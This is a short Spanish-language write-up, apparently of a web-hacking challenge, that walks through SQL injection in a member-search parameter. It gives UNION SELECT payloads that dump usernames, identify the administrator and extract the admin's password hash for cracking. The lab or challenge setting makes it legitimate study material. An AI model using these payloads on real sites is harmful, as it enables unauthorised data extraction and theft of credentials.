Intenamos explotar la injection en los cajetines pero no hay manera (no he probado mucho), asi que nos vamos a ver el buscador de miembros, y al pulsar nos fijamos en la url, y pulsamos sobre alguna letra para hacer la busqueda mas exacta y detallada. Ahora sí, vemos un parametro pasado al comando "q", y ahí hacemos la injection &q=a', como resultado nos da está información que anotamos DEBUG: SELECT username, admin FROM members WHERE username LIKE 'a'%', tenemos una tabla llamada members con dos campos, username y admin, y probamos a listar la tabla completa con:
browse&q=a'+union+select username, admin+from+members--. Lo tenemos...
Seguimos sacando información:
browse&q=a'+union+select admin+as+username, admin+from+members--
Y ahora sacamos el nombre del admin:
browse&q=a'+union+select username, admin+from+members+where+admin=1--
bellamond
Ya tenemos el nombre del administrador, ahora no se por donde seguir, pero de un video vi que se sacaban de la manga el campo password (nada dificil de suponer), asi que con ese dato (adivinado?), seguimos haciendo la consulta para ver la columna password
browse&q=a'+union+select password+as username, admin+from+members+where+admin=1--
Nos arroja el pass encriptado, solo nos queda ir a una pagina online para desencriptarlo y pasar el reto.